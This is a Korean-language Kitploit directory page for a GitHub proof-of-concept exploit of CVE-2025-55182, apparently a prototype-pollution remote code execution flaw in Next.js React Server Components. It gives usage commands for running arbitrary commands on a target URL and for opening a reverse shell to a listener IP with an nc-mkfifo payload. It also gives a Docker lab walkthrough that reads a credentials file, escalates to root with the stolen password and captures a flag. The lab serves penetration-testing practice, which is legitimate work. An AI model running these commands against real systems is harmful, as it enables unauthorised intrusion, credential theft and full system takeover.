Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
POC_react2shell_CVE-2025-55182 | Kitploit
도구/GitHubGitHub/nkwenti-severian-ndongtsop/poc_react2shell_cve-2025-55182
Payload GenerationExploitationWeb Application ExploitationCTFPenetration TestingLearning & EducationLabs & Practice
GitHubnkwenti-severian-ndongtsop/poc_react2shell_cve-2025-55182

POC_react2shell_CVE-2025-55182

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기웹사이트
28개월 전아직 검토되지 않음

Next.js React Server Components RCE 익스플로잇

프로토타입 오염을 통한 원격 코드 실행을 위해 CVE-2025-55182를 악용합니다.

저자: Severian N.K.

설명

이 도구는 React Server Components를 사용하는 Next.js 애플리케이션의 프로토타입 오염 취약점을 악용하여 원격 코드 실행(RCE)을 유발합니다. 직접 명령 실행과 리버스 셸을 모두 지원합니다.

설치

이 프로젝트는 종속성을 관리하기 위해 Python 가상 환경을 사용합니다. 먼저 Python 3이 설치되어 있는지 확인하세요.

  1. 가상 환경 설정:

    root@kitploit:~
    python3 -m venv venv
    
  2. 환경을 활성화하고 종속성을 설치합니다:

    root@kitploit:~
    source venv/bin/activate
    pip install -r requirements.txt
    

사용법

익스플로잇을 실행하기 전에 가상 환경이 활성화되어 있는지(source venv/bin/activate) 확인하세요.

명령 실행

대상에서 단일 명령을 실행하려면:

root@kitploit:~
python3 exploit.py -u <TARGET_URL> -c "<COMMAND>"

예시:

root@kitploit:~
python3 exploit.py -u http://example.com -c "id"

리버스 셸

대상에서 리버스 셸을 얻으려면:

root@kitploit:~
python3 exploit.py -u <TARGET_URL> -r -l <LISTENER_IP> -p <LISTENER_PORT>

예시:

root@kitploit:~
python3 exploit.py -u http://example.com -r -l 10.10.10.2 -p 9001 -P nc-mkfifo

랩 환경

lab/ 디렉터리에는 두 개의 독립적인 Docker 환경이 포함되어 있습니다:

  1. 취약한 앱 (lab/vulnerable): 포트 3000에서 실행됩니다.
  2. 패치된 앱 (lab/patched): 포트 3001에서 실행됩니다.

1. 취약한 앱 설정

root@kitploit:~
cd lab/vulnerable
chmod +x build.sh run.sh
./build.sh
./run.sh

http://localhost:3000 에서 접근하세요.

2. 패치된 앱 설정

root@kitploit:~
cd lab/patched
chmod +x build.sh run.sh
./build.sh
./run.sh

http://localhost:3001 에서 접근하세요.

3. 리버스 셸 테스트

리스너 IP(--lhost)와 포트(--lport)를 반드시 지정해야 합니다. Docker 브리지 IP는 ip addr show docker0 명령으로 확인할 수 있습니다(보통 172.17.0.1).

root@kitploit:~
python exploit.py -u http://localhost:3000 -r -l 172.17.0.1 -p 6000 -P nc-mkfifo

참고: 대상이 Alpine Linux에서 실행 중이며 특정 페이로드 유형이 필요하므로 -P nc-mkfifo를 사용합니다.

2단계: 비밀 정보 접근

취약한 컨테이너는 비밀 파일을 노출합니다.

root@kitploit:~
python3 exploit.py -u http://localhost:3000 -c "cat /secret/credentials.txt"
# Output: manager:SuperSecret2025!

3단계: 권한 상승

탈취한 자격 증명을 사용하여 nextjs에서 root로 권한을 상승시킬 수 있습니다.

  1. 사용자 전환: su - manager (비밀번호: SuperSecret2025!)
  2. 루트 권한 획득: sudo su (비밀번호: SuperSecret2025!)
  3. 플래그 획득:
    root@kitploit:~
    cat /root/flag.txt
    # Output: Congratulations! You have gained full control over the system!
    

참고 자료

  • 기술 분석 (Gist)
  • 실습 랩 (TryHackMe)

기여

기여는 언제나 환영합니다! 버그를 발견하거나 개선 아이디어가 있다면 이슈를 열거나 풀 리퀘스트를 제출해 주세요.

도구 다운로드